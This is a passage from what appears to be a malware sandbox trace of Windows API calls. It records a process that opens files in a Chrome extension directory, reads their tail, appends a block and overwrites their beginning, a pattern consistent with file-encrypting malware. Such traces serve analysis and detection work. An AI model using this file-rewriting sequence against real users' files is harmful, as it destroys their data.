dwMilliseconds=0xffffffff) returned 0x0 [0174.410] ReleaseMutex (hMutex=0x168) returned 1 [0174.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.410] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea4da8, nNumberOfBytesToRead=0xea, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4da8*, lpNumberOfBytesRead=0x2fdf2bc*=0xea, lpOverlapped=0x0) returned 1 [0174.411] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.411] WriteFile (in: hFile=0x1dc, lpBuffer=0x284a9e8*, nNumberOfBytesToWrite=0x672, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x284a9e8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x672, lpOverlapped=0x0) returned 1 [0174.412] CloseHandle (hObject=0x1dc) returned 1 [0174.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.412] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.413] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x181aa [0174.413] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.413] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.413] ReleaseMutex (hMutex=0x168) returned 1 [0174.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_game_sender.js", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0174.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_game_sender.js", cchWideChar=19, lpMultiByteStr=0x1f8867c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cast_game_sender.js", lpUsedDefaultChar=0x0) returned 19 [0174.413] ReadFile (in: hFile=0x1dc, lpBuffer=0x284a9c8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x284a9c8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0174.419] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x171aa [0174.419] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0174.423] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x171aa [0174.423] WriteFile (in: hFile=0x1dc, lpBuffer=0x25abd08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25abd08*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.423] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0174.423] WriteFile (in: hFile=0x1dc, lpBuffer=0x284aac8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x284aac8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0174.423] CloseHandle (hObject=0x1dc) returned 1 [0174.423] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.424] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.424] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3b [0174.424] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.424] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.424] ReleaseMutex (hMutex=0x168) returned 1 [0174.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="devices.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0174.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="devices.html", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="devices.html", lpUsedDefaultChar=0x0) returned 12 [0174.424] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f96bf0, nNumberOfBytesToRead=0x3b, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f96bf0*, lpNumberOfBytesRead=0x2fdf2bc*=0x3b, lpOverlapped=0x0) returned 1 [0174.425] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.425] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c3, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5c3, lpOverlapped=0x0) returned 1 [0174.426] CloseHandle (hObject=0x1dc) returned 1 [0174.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.426] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.426] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x38a8 [0174.426] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.427] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.427] ReleaseMutex (hMutex=0x168) returned 1 [0174.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="feedback.html", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="feedback.html", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="feedback.html", lpUsedDefaultChar=0x0) returned 13 [0174.427] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0174.443] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x28a8 [0174.443] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0174.450] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x28a8 [0174.450] WriteFile (in: hFile=0x1dc, lpBuffer=0x25abd08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25abd08*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.450] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0174.454] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0174.454] CloseHandle (hObject=0x1dc) returned 1 [0174.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.455] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.455] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4827 [0174.455] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.455] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.455] ReleaseMutex (hMutex=0x168) returned 1 [0174.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.455] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.222] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3827 [0175.233] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.234] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3827 [0175.234] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad038*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad038*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0175.235] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0175.235] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0175.235] CloseHandle (hObject=0x1dc) returned 1 [0175.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0175.236] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4afe [0175.237] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.237] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.237] ReleaseMutex (hMutex=0x168) returned 1 [0175.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0175.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0175.237] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.239] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3afe [0175.239] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.240] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3afe [0175.240] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad038*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad038*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0175.241] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0175.241] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0175.241] CloseHandle (hObject=0x1dc) returned 1 [0175.242] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0175.243] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.243] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5079 [0175.243] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.243] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.243] ReleaseMutex (hMutex=0x168) returned 1 [0175.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0175.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0175.243] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.245] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4079 [0175.245] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.246] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4079 [0175.246] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad038*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad038*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0175.247] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0175.247] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0175.247] CloseHandle (hObject=0x1dc) returned 1 [0175.247] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0175.249] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.249] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x55a3 [0175.249] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.249] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.249] ReleaseMutex (hMutex=0x168) returned 1 [0175.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0175.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0175.249] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.251] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x45a3 [0175.251] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.278] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x45a3 [0175.278] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad038*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad038*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0175.278] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0175.278] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0175.278] CloseHandle (hObject=0x1dc) returned 1 [0175.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 